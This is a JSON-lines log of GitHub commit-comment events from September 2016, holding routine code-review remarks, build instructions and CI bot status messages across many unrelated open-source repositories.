{"id":"4592617054","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19104427,"position":null,"line":null,"path":null,"commit_id":"3ae29ff6b267ddbad0b8e70897444d3ec29137a7","created_at":"2016-09-20T21:29:16Z","updated_at":"2016-09-20T21:29:16Z","body":"@MichaelWallace30 \r\n**Step Uno**: create a build directory in the root directory and open a command prompt in there\r\n**Step Dos**: inside the build directory, type the command \"cmake -G Visual Studio 12 2013 ../\" which will build your files and use the visual studio 2013 compiler toolkit.\r\n**Step Tres**: Double click on the solution, and build all (you may build the exe, shared, and static, which may be stupid, but this will be only one time for now. I'll add in commands to only compile one of them, soon enough.).\r\n**Step Cuatro**: Once done compiling create another build directory called \"csharpwrap\" or whatever you want to call it, in the root directory next to build directory. cmd in there as well.\r\n**Step Cinco**: use the command \"cmake -G Visual Studio 12 2013 /path/to/csharp/cmake/file\" which will build all of it for you.\r\n**Step Seis**: Double click the solution in there, go to Preferences->Linker->Additional Library Directories, then add the path to the .lib file that you built the CommProto library in (it should be in your \"build\" folder, inside Debug.).\r\n\r\nCompile afterwards, Everything should be set up for you except the directory of which your static library is in."}},"created_at":"2016-09-20T21:29:16Z"}
{"id":"4592617906","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104432,"position":null,"line":null,"path":null,"commit_id":"ee7afebc5e3d016db2baff6e14e8e21a02e49a09","created_at":"2016-09-20T21:29:25Z","updated_at":"2016-09-20T21:29:25Z","body":"Lets connect tomorrow. Will call you.."}},"created_at":"2016-09-20T21:29:25Z"}
{"id":"4592618852","type":"CommitCommentEvent","actor":{"login":"bezgerts"},"repo":{"name":"bezgerts/Handshakes"},"payload":{"comment":{"id":19104437,"position":14,"line":15,"path":"src/main/java/HandshakeThread.java","commit_id":"22689f41d0494d820f8aadad0276292324a5d8eb","created_at":"2016-09-20T21:29:35Z","updated_at":"2016-09-20T21:29:35Z","body":"Почему?\r\nЯ же во все потоки передаю один и тот же CopyOnWriteArrayList<ArrayList<String>> result, в который все потоки пишут результат. \r\nЯ это делаю для того, чтобы потом отдать общий результат \"потребителю\" этого \"модуля\""}},"created_at":"2016-09-20T21:29:35Z"}
{"id":"4592620441","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19104443,"position":null,"line":null,"path":null,"commit_id":"3ae29ff6b267ddbad0b8e70897444d3ec29137a7","created_at":"2016-09-20T21:29:53Z","updated_at":"2016-09-20T21:29:53Z","body":"Also I'll add the CSharp example."}},"created_at":"2016-09-20T21:29:53Z"}
{"id":"4592621298","type":"CommitCommentEvent","actor":{"login":"norizatonz"},"repo":{"name":"adobe/brackets"},"payload":{"comment":{"id":19104448,"position":4,"line":98,"path":"src/extensions/default/CSSCodeHints/CSSProperties.json","commit_id":"a340c3067a44016203ebaa2fa22bd6ced7a668fa","created_at":"2016-09-20T21:30:01Z","updated_at":"2016-09-20T21:30:01Z","body":"add properties"}},"created_at":"2016-09-20T21:30:01Z"}
{"id":"4592633010","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19104474,"position":null,"line":null,"path":null,"commit_id":"6f05df22bc28844ccd99519d6311887d45768977","created_at":"2016-09-20T21:32:06Z","updated_at":"2016-09-20T21:32:06Z","body":"MakeWebKitWork (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f05df22bc28844ccd99519d6311887d45768977-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f05df22bc28844ccd99519d6311887d45768977-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T21:32:06Z"}
{"id":"4592637992","type":"CommitCommentEvent","actor":{"login":"bezgerts"},"repo":{"name":"bezgerts/Handshakes"},"payload":{"comment":{"id":19104485,"position":23,"line":24,"path":"src/main/java/Starter.java","commit_id":"61a2f79225cf454d1e600f16e48bd5fa8c3708a0","created_at":"2016-09-20T21:32:57Z","updated_at":"2016-09-20T21:32:57Z","body":"У меня для разбивки есть вот такой метод, который разбивает на коллекции по N элементов в каждой:\r\n` /**\r\n     *\r\n     * This method splits splits the array into several arrays of length L;\r\n     *\r\n     * @param list = Array that will be chopped;\r\n     * @param L = Size of a chopped array part;\r\n     *\r\n     * @return Array of array's parts.\r\n     *\r\n     */\r\n    static <T> List<List<T>> chopped(List<T> list, final int L) {\r\n        List<List<T>> parts = new ArrayList<List<T>>();\r\n        final int N = list.size();\r\n        for (int i = 0; i < N; i += L) {\r\n            parts.add(new ArrayList<T>(\r\n                    list.subList(i, Math.min(N, i + L)))\r\n            );\r\n        }\r\n        return parts;\r\n    }`"}},"created_at":"2016-09-20T21:32:57Z"}
{"id":"4592639657","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/image-sharer-lsq921224"},"payload":{"comment":{"id":19104491,"position":48,"line":169,"path":"test/flows/share_image_flow_test.rb","commit_id":"c99d62a14df31a8c0e1e7e330551aea40fd179a1","created_at":"2016-09-20T21:33:14Z","updated_at":"2016-09-20T21:33:14Z","body":"Use the static `cute_puppy_url` here rather than the dynamic `second_image_to_share.url`"}},"created_at":"2016-09-20T21:33:14Z"}
{"id":"4592639948","type":"CommitCommentEvent","actor":{"login":"jrmartin"},"repo":{"name":"openworm/org.geppetto.frontend"},"payload":{"comment":{"id":19104494,"position":31,"line":185,"path":"src/main/webapp/js/components/ComponentsInitialization_OSB.js","commit_id":"fced96a82a343de07bb7d6bc5d8d48bb14e50e34","created_at":"2016-09-20T21:33:17Z","updated_at":"2016-09-20T21:33:17Z","body":"@gidili The value being a command was just an easy way to test the external handler was getting messages by printint to console. Next commit will be replaced with identifier strings.  "}},"created_at":"2016-09-20T21:33:17Z"}
{"id":"4592643570","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/image-sharer-lsq921224"},"payload":{"comment":{"id":19104507,"position":48,"line":169,"path":"test/flows/share_image_flow_test.rb","commit_id":"c99d62a14df31a8c0e1e7e330551aea40fd179a1","created_at":"2016-09-20T21:33:56Z","updated_at":"2016-09-20T21:33:56Z","body":"Also, assert this both before and after you clicked share (since the bug was that it only changed _after_ share was clicked)."}},"created_at":"2016-09-20T21:33:56Z"}
{"id":"4592647580","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/image-sharer-lsq921224"},"payload":{"comment":{"id":19104518,"position":73,"line":194,"path":"test/flows/share_image_flow_test.rb","commit_id":"c99d62a14df31a8c0e1e7e330551aea40fd179a1","created_at":"2016-09-20T21:34:41Z","updated_at":"2016-09-20T21:34:41Z","body":"As above, use the static `puppy_url` here rather than the dynamic `first_image_to_share.url`"}},"created_at":"2016-09-20T21:34:41Z"}
{"id":"4592648439","type":"CommitCommentEvent","actor":{"login":"Kurzer777"},"repo":{"name":"Kurzer777/Hello-World"},"payload":{"comment":{"id":19104525,"position":null,"line":null,"path":null,"commit_id":"b58ef87f9cced43dd072e10a222c15d1342498eb","created_at":"2016-09-20T21:34:50Z","updated_at":"2016-09-20T21:34:50Z","body":"\r\n\r\n\r\n[Test1.txt](https://github.com/Kurzer777/Hello-World/files/483646/Test1.txt)\r\n[Test2.txt](https://github.com/Kurzer777/Hello-World/files/483647/Test2.txt)\r\n"}},"created_at":"2016-09-20T21:34:50Z"}
{"id":"4592649970","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/image-sharer-lsq921224"},"payload":{"comment":{"id":19104531,"position":89,"line":210,"path":"test/flows/share_image_flow_test.rb","commit_id":"c99d62a14df31a8c0e1e7e330551aea40fd179a1","created_at":"2016-09-20T21:35:06Z","updated_at":"2016-09-20T21:35:06Z","body":"As above, use the static `cute_puppy_url` here rather than the dynamic `second_image_to_share.url`"}},"created_at":"2016-09-20T21:35:06Z"}
{"id":"4592650693","type":"CommitCommentEvent","actor":{"login":"tongfw"},"repo":{"name":"sheepdog-ng/sheepdog-ng"},"payload":{"comment":{"id":19104536,"position":null,"line":null,"path":null,"commit_id":"2fc4b71c21f3db513bf3d3bf976d01f1b7b1256b","created_at":"2016-09-20T21:35:14Z","updated_at":"2016-09-20T21:35:14Z","body":"It's not safe if recovery in RW_PREPARE_LIST state"}},"created_at":"2016-09-20T21:35:14Z"}
{"id":"4592657288","type":"CommitCommentEvent","actor":{"login":"bezgerts"},"repo":{"name":"bezgerts/Handshakes"},"payload":{"comment":{"id":19104552,"position":44,"line":42,"path":"src/main/java/Starter.java","commit_id":"7381678126bfa47a858a8914b577ee29265bccd9","created_at":"2016-09-20T21:36:32Z","updated_at":"2016-09-20T21:36:32Z","body":"Прикручу)"}},"created_at":"2016-09-20T21:36:32Z"}
{"id":"4592657878","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/image-sharer-lsq921224"},"payload":{"comment":{"id":19104555,"position":89,"line":210,"path":"test/flows/share_image_flow_test.rb","commit_id":"c99d62a14df31a8c0e1e7e330551aea40fd179a1","created_at":"2016-09-20T21:36:39Z","updated_at":"2016-09-20T21:36:39Z","body":"You could rename the variables from `first_image_to_share` to `puppy_image` and `second_image_to_share` to `cute_puppy_image` to match the `*_url` variable names, but that's a big confusing. That's why in the flow test skeleton it used a \"cute puppy image\" and an \"ugly cat\" image."}},"created_at":"2016-09-20T21:36:39Z"}
{"id":"4592658227","type":"CommitCommentEvent","actor":{"login":"moozzyk"},"repo":{"name":"SignalR/SignalR"},"payload":{"comment":{"id":19104558,"position":null,"line":null,"path":null,"commit_id":"6ce631433b57505b0b3f1fe24f68f0681fca5aef","created_at":"2016-09-20T21:36:44Z","updated_at":"2016-09-20T21:36:44Z","body":"Keep alive for long polling caused more issues than it solved:\r\nhttps://github.com/SignalR/SignalR/issues/3106#issuecomment-48534576"}},"created_at":"2016-09-20T21:36:44Z"}
{"id":"4592658764","type":"CommitCommentEvent","actor":{"login":"bezgerts"},"repo":{"name":"bezgerts/Handshakes"},"payload":{"comment":{"id":19104561,"position":44,"line":42,"path":"src/main/java/Starter.java","commit_id":"7381678126bfa47a858a8914b577ee29265bccd9","created_at":"2016-09-20T21:36:50Z","updated_at":"2016-09-20T21:36:50Z","body":"Вопрос только какой логгер лучше..?"}},"created_at":"2016-09-20T21:36:50Z"}
{"id":"4592659833","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19104565,"position":null,"line":null,"path":null,"commit_id":"4067bc4270aedec12ff5f42e9f8d90d2469e800a","created_at":"2016-09-20T21:37:03Z","updated_at":"2016-09-20T21:37:03Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_core/builds/2095\n"}},"created_at":"2016-09-20T21:37:03Z"}
{"id":"4592661218","type":"CommitCommentEvent","actor":{"login":"jasongilanfarr"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":19104570,"position":32,"line":287,"path":"src/main/scala/mesosphere/mesos/TaskGroupBuilder.scala","commit_id":"361689041c40ed6f309b712ce231e06632149590","created_at":"2016-09-20T21:37:18Z","updated_at":"2016-09-20T21:37:18Z","body":"Umm, read the original code: starts with None, then getOrElse => Some(). So the code was almost definitely copied and pasted without much thought."}},"created_at":"2016-09-20T21:37:18Z"}
{"id":"4592666312","type":"CommitCommentEvent","actor":{"login":"projectkk2glider"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":19104588,"position":null,"line":null,"path":null,"commit_id":"f03837f45d61733b1d363d82c7455d33a3b34e8e","created_at":"2016-09-20T21:38:16Z","updated_at":"2016-09-20T21:38:16Z","body":"No, it is my idea. The tests I have done shoved this kind of behavior and I used it to solve the problem. The underlying problem is still there, it's just masked now.\r\n\r\nFor write I haven't done any extensive tests, but for now I haven't seen any problem."}},"created_at":"2016-09-20T21:38:16Z"}
{"id":"4592668545","type":"CommitCommentEvent","actor":{"login":"mkillor"},"repo":{"name":"mkillor/CSharp-example"},"payload":{"comment":{"id":19104593,"position":3,"line":13,"path":"ConsoleApplication1/ConsoleApplication1/Program.cs","commit_id":"7f11f515187351ed9efa3be8a097eab5f3cbe5f9","created_at":"2016-09-20T21:38:41Z","updated_at":"2016-09-20T21:38:41Z","body":"asdf"}},"created_at":"2016-09-20T21:38:41Z"}
{"id":"4592668868","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":19104596,"position":null,"line":null,"path":null,"commit_id":"a73d8f1609f87b1bae95ab0187da55a45ae9e692","created_at":"2016-09-20T21:38:45Z","updated_at":"2016-09-20T21:38:45Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cIxx3oogSze-WuV8Ea4L1Q"}},"created_at":"2016-09-20T21:38:45Z"}
{"id":"4592670760","type":"CommitCommentEvent","actor":{"login":"tmeissner"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19104601,"position":6,"line":33,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-20T21:39:08Z","updated_at":"2016-09-20T21:39:08Z","body":"I would avoid using the C-Interfaces. At work we have run into various problems which debugging has cost us days. Depending functions on the C-interface could discourage developers from using the CoreLib I think. I avoid it at all costs, using it only for reference models of complex designs (like cryptographic functions)."}},"created_at":"2016-09-20T21:39:08Z"}
{"id":"4592676536","type":"CommitCommentEvent","actor":{"login":"MrCsabaToth"},"repo":{"name":"gdgfresno/valleydevfest"},"payload":{"comment":{"id":19104615,"position":null,"line":null,"path":null,"commit_id":"f32228f64ceb36697bb701ceabc7ffbd936f9555","created_at":"2016-09-20T21:40:17Z","updated_at":"2016-09-20T21:40:17Z","body":"Fixes #19"}},"created_at":"2016-09-20T21:40:17Z"}
{"id":"4592680016","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":19104628,"position":32,"line":287,"path":"src/main/scala/mesosphere/mesos/TaskGroupBuilder.scala","commit_id":"361689041c40ed6f309b712ce231e06632149590","created_at":"2016-09-20T21:41:00Z","updated_at":"2016-09-20T21:41:00Z","body":"the original code mutates the value of containerInfoOpt if/when containerInfo is invoked (it's a func for a reason). containerInfo appears to be invoked if volumes or the image is set. so in those cases there would be a MESOS container created. otherwise None."}},"created_at":"2016-09-20T21:41:00Z"}
{"id":"4592682482","type":"CommitCommentEvent","actor":{"login":"AlfieC"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19104633,"position":null,"line":null,"path":null,"commit_id":"56857ae801ae8a149cb6281d8d36bfa313502abb","created_at":"2016-09-20T21:41:28Z","updated_at":"2016-09-20T21:41:28Z","body":"Line 48 of the new patch file - it says that it causes the main thread to sleep for random amounts of time. Didn't you guys fix that? In the \"if you have work to do, just do it\" commit. If so, saving specific chunks be enabled now."}},"created_at":"2016-09-20T21:41:28Z"}
{"id":"4592684802","type":"CommitCommentEvent","actor":{"login":"bubbie"},"repo":{"name":"bubbie/bluks-adventure-into-space"},"payload":{"comment":{"id":19104641,"position":98,"line":98,"path":"entities.lua","commit_id":"6c8b0e8f6fb946876fcde4d12157c44edb31cf3e","created_at":"2016-09-20T21:41:56Z","updated_at":"2016-09-20T21:41:56Z","body":"that's a sausage"}},"created_at":"2016-09-20T21:41:56Z"}
{"id":"4592694603","type":"CommitCommentEvent","actor":{"login":"mauritsvanrees"},"repo":{"name":"plone/documentation"},"payload":{"comment":{"id":19104670,"position":178,"line":178,"path":"develop/GET_RID_OF_QI.rst","commit_id":"633cb5214c3ac99eb1d2531f7393d2dbe7185964","created_at":"2016-09-20T21:43:52Z","updated_at":"2016-09-20T21:43:52Z","body":"Done."}},"created_at":"2016-09-20T21:43:52Z"}
{"id":"4592695176","type":"CommitCommentEvent","actor":{"login":"mauritsvanrees"},"repo":{"name":"plone/documentation"},"payload":{"comment":{"id":19104671,"position":311,"line":311,"path":"develop/GET_RID_OF_QI.rst","commit_id":"633cb5214c3ac99eb1d2531f7393d2dbe7185964","created_at":"2016-09-20T21:43:59Z","updated_at":"2016-09-20T21:43:59Z","body":"Done."}},"created_at":"2016-09-20T21:43:59Z"}
{"id":"4592695259","type":"CommitCommentEvent","actor":{"login":"turtleli"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19104672,"position":null,"line":null,"path":null,"commit_id":"c64e8f944e471776d7cd242a6843d752e103f240","created_at":"2016-09-20T21:44:00Z","updated_at":"2016-09-20T21:44:00Z","body":"It's possible. Updating wx to the latest 3.0.x branch would also fix the issue, though it doesn't play nicely with our locking implementation (without https://github.com/turtleli/pcsx2/commit/baa9fdd9de5af722e972681762ddc931dea3325c or similar there would be a 20-30 second game boot soft lock on Windows), though we will have to update at some point anyway."}},"created_at":"2016-09-20T21:44:00Z"}
{"id":"4592697108","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"shb2304/java_pft"},"payload":{"comment":{"id":19104678,"position":22,"line":22,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/HelperBase.java","commit_id":"51cdf67bb6a6abcb97fe08b17a79f7940ec105f9","created_at":"2016-09-20T21:44:22Z","updated_at":"2016-09-20T21:44:22Z","body":"клик не нужен"}},"created_at":"2016-09-20T21:44:22Z"}
{"id":"4592700180","type":"CommitCommentEvent","actor":{"login":"Darkmet98"},"repo":{"name":"Darkmet98/vitashell-themes"},"payload":{"comment":{"id":19104685,"position":null,"line":null,"path":null,"commit_id":"656fad21db7f2388f06134b0e0c31659a065d2d2","created_at":"2016-09-20T21:44:59Z","updated_at":"2016-09-20T21:44:59Z","body":"Gracias @Keizel , ya lo he añadido "}},"created_at":"2016-09-20T21:44:59Z"}
{"id":"4592700505","type":"CommitCommentEvent","actor":{"login":"jamalex"},"repo":{"name":"christianmemije/kolibri"},"payload":{"comment":{"id":19104687,"position":32,"line":32,"path":"kolibri/content/test/test_downloadcontent.py","commit_id":"156c011331908685859c745dedc5d7bb7cf51eae","created_at":"2016-09-20T21:45:04Z","updated_at":"2016-09-20T21:45:04Z","body":"Would be good to pull this value from the `constants`, rather than putting in an arbitrary string."}},"created_at":"2016-09-20T21:45:04Z"}
{"id":"4592702595","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"shb2304/java_pft"},"payload":{"comment":{"id":19104690,"position":24,"line":24,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/HelperBase.java","commit_id":"51cdf67bb6a6abcb97fe08b17a79f7940ec105f9","created_at":"2016-09-20T21:45:29Z","updated_at":"2016-09-20T21:45:29Z","body":"wd.findElement(locator) - из \r\nто конструкции можно сделать метод find(By by)\r\nв рамках текущего мтеода эта конструкция повторяется 2 раза - можно сделать чтобы элемент искался 1 раз"}},"created_at":"2016-09-20T21:45:29Z"}
{"id":"4592704047","type":"CommitCommentEvent","actor":{"login":"vivdnp"},"repo":{"name":"antonyur/Java_GoIT_AntonYurchenko"},"payload":{"comment":{"id":19104694,"position":27,"line":27,"path":"src/module5/BookingComAPI.java","commit_id":"87337df600b0c8ba19f09f0c5932cce12c53a9e4","created_at":"2016-09-20T21:45:45Z","updated_at":"2016-09-20T21:45:45Z","body":"в джаве не принято переносить открывающую скобку )"}},"created_at":"2016-09-20T21:45:45Z"}
{"id":"4592704378","type":"CommitCommentEvent","actor":{"login":"yinghe616"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19104698,"position":227,"line":204,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T21:45:49Z","updated_at":"2016-09-20T21:45:49Z","body":"your input data are pre-calculated at  QGaussLobatto or support points, so here you might want to use support points as quadrature points "}},"created_at":"2016-09-20T21:45:49Z"}
{"id":"4592709706","type":"CommitCommentEvent","actor":{"login":"jamalex"},"repo":{"name":"christianmemije/kolibri"},"payload":{"comment":{"id":19104710,"position":38,"line":38,"path":"kolibri/content/test/test_downloadcontent.py","commit_id":"156c011331908685859c745dedc5d7bb7cf51eae","created_at":"2016-09-20T21:46:53Z","updated_at":"2016-09-20T21:46:53Z","body":"Download filename should still have a `.pdf` extension."}},"created_at":"2016-09-20T21:46:53Z"}
{"id":"4592721697","type":"CommitCommentEvent","actor":{"login":"yinghe616"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19104740,"position":276,"line":253,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T21:49:19Z","updated_at":"2016-09-20T21:49:19Z","body":"remove one itr_weights; you can also use the fe_values.get_JxW_values() where they should be the same (if not, they should differ with a same multiplier) "}},"created_at":"2016-09-20T21:49:19Z"}
{"id":"4592722626","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19104742,"position":null,"line":null,"path":null,"commit_id":"46799e7206736db0e03b7ce6f6dc9e30fadd5fd7","created_at":"2016-09-20T21:49:29Z","updated_at":"2016-09-20T21:49:29Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#NFbkLaNiS_CVE01iwpdQrA"}},"created_at":"2016-09-20T21:49:29Z"}
{"id":"4592722729","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/slider"},"payload":{"comment":{"id":19104743,"position":null,"line":null,"path":null,"commit_id":"b99185e0f1c6edd6d930f57e95ec93c3cf8261f0","created_at":"2016-09-20T21:49:30Z","updated_at":"2016-09-20T21:49:30Z","body":"Wow wtf github... I didn't realise posting at the bottom would repeat my comment 9000 times."}},"created_at":"2016-09-20T21:49:30Z"}
{"id":"4592727252","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19104751,"position":null,"line":null,"path":null,"commit_id":"ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5","created_at":"2016-09-20T21:50:23Z","updated_at":"2016-09-20T21:50:23Z","body":"fixBranchTransition (mitchute) - x86_64-MacOS-10.9-clang: OK (2332 of 2333 tests passed, 1 test warnings)\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T21:50:23Z"}
{"id":"4592729344","type":"CommitCommentEvent","actor":{"login":"jamalex"},"repo":{"name":"christianmemije/kolibri"},"payload":{"comment":{"id":19104755,"position":42,"line":42,"path":"kolibri/content/test/test_downloadcontent.py","commit_id":"156c011331908685859c745dedc5d7bb7cf51eae","created_at":"2016-09-20T21:50:48Z","updated_at":"2016-09-20T21:50:48Z","body":"May just be GitHub's display format, but double-check that the indentation is consistent (the `self` parts should line up)."}},"created_at":"2016-09-20T21:50:48Z"}
{"id":"4592735511","type":"CommitCommentEvent","actor":{"login":"yinghe616"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19104769,"position":282,"line":259,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T21:52:03Z","updated_at":"2016-09-20T21:52:03Z","body":"if compute the error with the weights information, it's better to use velocity_L2_error . for the L2 error, you don't have to divide it by n_points"}},"created_at":"2016-09-20T21:52:03Z"}
{"id":"4592735868","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":19104771,"position":null,"line":null,"path":null,"commit_id":"daf6371ff4a09dbbdcf32ace4e7a4284330f00c9","created_at":"2016-09-20T21:52:08Z","updated_at":"2016-09-20T21:52:08Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#MPJ_NwmDQ--p0uYMQtq3Zg"}},"created_at":"2016-09-20T21:52:08Z"}
{"id":"4592739864","type":"CommitCommentEvent","actor":{"login":"popcar2"},"repo":{"name":"bubbie/bluks-adventure-into-space"},"payload":{"comment":{"id":19104785,"position":98,"line":98,"path":"entities.lua","commit_id":"6c8b0e8f6fb946876fcde4d12157c44edb31cf3e","created_at":"2016-09-20T21:52:54Z","updated_at":"2016-09-20T21:52:54Z","body":"Most impressive"}},"created_at":"2016-09-20T21:52:54Z"}
{"id":"4592740284","type":"CommitCommentEvent","actor":{"login":"jamalex"},"repo":{"name":"christianmemije/kolibri"},"payload":{"comment":{"id":19104787,"position":46,"line":46,"path":"kolibri/content/test/test_downloadcontent.py","commit_id":"156c011331908685859c745dedc5d7bb7cf51eae","created_at":"2016-09-20T21:52:59Z","updated_at":"2016-09-20T21:52:59Z","body":"We would expect a 200 on this one. If your view supports caching, you would need to set some headers here (e.g. HTTP_IF_MODIFIED_SINCE or similar) in order to test that.\r\n\r\nYou can also do asserts regarding the response headers -- you should make sure the content-disposition stuff is in there."}},"created_at":"2016-09-20T21:52:59Z"}
{"id":"4592740610","type":"CommitCommentEvent","actor":{"login":"nehalB"},"repo":{"name":"nehalB/Knowledgetime_Website"},"payload":{"comment":{"id":19104788,"position":null,"line":null,"path":null,"commit_id":"e128c5e57b8ac398ee2997b8bfb9274f71e52314","created_at":"2016-09-20T21:53:03Z","updated_at":"2016-09-20T21:53:03Z","body":"no significant changes made"}},"created_at":"2016-09-20T21:53:03Z"}
{"id":"4592740792","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19104791,"position":null,"line":null,"path":null,"commit_id":"33292be60050185d98dcfc765c1d5972362ff6b9","created_at":"2016-09-20T21:53:05Z","updated_at":"2016-09-20T21:53:05Z","body":"ASIHP-validation1 (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-20T21:53:05Z"}
{"id":"4592741909","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19104793,"position":null,"line":null,"path":null,"commit_id":"3ae29ff6b267ddbad0b8e70897444d3ec29137a7","created_at":"2016-09-20T21:53:20Z","updated_at":"2016-09-20T21:53:20Z","body":"whatever you named your build directories, if you build them in the CommProtocol directory, make sure you include in the .gitignore file."}},"created_at":"2016-09-20T21:53:20Z"}
{"id":"4592743149","type":"CommitCommentEvent","actor":{"login":"npostavs"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":19104798,"position":26,"line":632,"path":"lisp/git-commit.el","commit_id":"1c05b110ef5629e607feea0384a19ac2c036cc51","created_at":"2016-09-20T21:53:36Z","updated_at":"2016-09-20T21:53:36Z","body":"oops, fixed in a9032a42306cb6d085d21e3b2c3604f402b901f0"}},"created_at":"2016-09-20T21:53:36Z"}
{"id":"4592743319","type":"CommitCommentEvent","actor":{"login":"1ec5"},"repo":{"name":"mapbox/mapbox-gl-style-spec"},"payload":{"comment":{"id":19104800,"position":14,"line":62,"path":"reference/v8.json","commit_id":"afb5121ca9510587c8fe7a786dbc6377aa2a9288","created_at":"2016-09-20T21:53:38Z","updated_at":"2016-09-20T21:53:38Z","body":"* [ ] Is the distance in meters?\r\n* [ ] Which direction does a = 0° point? (Also, clockwise, not \"like a clock\".)\r\n* [ ] Is the distance and angle measured from the volumetric center of the extruded geometry, or from the surface?"}},"created_at":"2016-09-20T21:53:38Z"}
